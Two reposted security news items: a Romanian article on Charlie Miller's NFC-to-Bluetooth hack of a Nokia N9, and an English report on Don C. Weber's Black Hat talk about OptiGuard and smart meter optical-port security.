Tehnologia NFC, urmatoarea tinta a hackerilor Tehnologia NFC, ce permite transferul de date intre doua gadgeturi la distanta mica, este urmatoarea tinta a hackerilor, care ar putea "sparge" telefonul pur si simplu stand langa detinatorul lui. Folosita in tot mai multe tari si pentru plati directe cu telefonul mobil, tehnologia NFC este vulnerabila atacurilor hackerilor priceputi care se pot apropia suficient de tinta, scrie VentureBeat. Deocamdata, tehnologia NFC nu are prea mult vulnerabilitati, insa una dintre ele a fost exploatata cu succes intr-o incercare de hacking prin NFC a unui telefon Nokia N9. Charlie Miller, specialist in securitate Accuvant Labs, a demonstrat cum un telefon se poate conecta prin NFC la un altul, iar dupa preluarea controlului conexiunii Bluetooth, toate datele din telefon pot fi transferate pe device-ul propriu de catre hacker. Hacking-ul tehnologiei NFC ar putea fi utilizat si pentru a trimite mesaje SMS prin intermediul telefonului atacat. Solutia cea mai evidenta pentru securitatea impotriva atacurilor prin NFC ar fi optiunea utilizatorului de a confirma manual orice conexiune. Sursa

Black Hat: Smart Meter (In)Security Spotlighted in Talk Security researcher Don C. Weber spoke about OptiGuard, a tool that can be used to assess the security of smart meters. The talk was pulled earlier this year at the ShmooCon conference. LAS VEGAS - BLACK HAT USA - Six months after calling off his talk at another security conference, researcher Don C. Weber stepped in front of an audience at the Black Hat conference in Las Vegas. His subject: smart meter security, and how the devices on the sides of homes across America could be potentially vulnerable to attack. "What we're happening these people understand…where they can improve - help them identify risk and help them prioritize that so they can address these issues in a cost-effective [fashion]," Weber said during remarks to the media after his presentation. Six months ago, Weber, who works for the security consultancy InGuardians, was set to discuss smart meter security in front of an audience of attendees at ShmooCon security conference in Washington, D.C. He pulled the talk at the request of a vendor. Today, he discussed a tool he created known as OptiGuard, which he said is designed to help utilities assess the optical port on their smart meters. The optical ports are used by field technician working for utility companies to pull configuration data from the meter, or to configure it. By attacking the optical port, an attacker could potentially access it and obtain free energy, commit corporate espionage tied to energy-usage levels or commit other acts, he said. "These are publicly facing devices," he said. "They can't have somebody standing at every single meter to make sure you don’t mess with it. They can't have a camera at every single meter." SecureState, another critical infrastructure consultancy, released a similar tool last week. While SecureState released the tool publicly, InGuardians opted to only make their tool available to utilities and the researchers that work with them. Optiguard supports is a tool that supports the ANSI C12.18 communication protocol, and enables users to potentially run procedures and read and write to tables. "One of the things that came out of this testing is that… not every single meter manufacturer protects every table," Weber explained during his presentation. "There might be some configuration data that they think doesn’t necessarily need to be protected by a security password…What our tool is doing is it's providing the utilities with the capability to look to see on these meters what information can I pull off without a security code. And then they can turn back around to the third-party service provider or to the meter vendor, and say, hey, why aren't we protecting this?" Weber said that there are a number of security mechanisms companies can pursue to protect smart meters, ranging from tamper alarms, toggle the optical port and secure data storage of information on the meter. Though he was reluctant to give the smart grid a grade in terms of safety citing the number of factor s involved – from the products being used to implementation – he told members of the media that he was confident that companies are doing their best to implement the technology securely. "Nobody likes you to tell them that their baby's ugly," he said. "We might say that your baby's ugly but we’re also showing you that when your baby grows up, if it grows up properly… and you do the proper things, then it will be a beautiful baby, it will be a beautiful adolescent and an adult." Sursa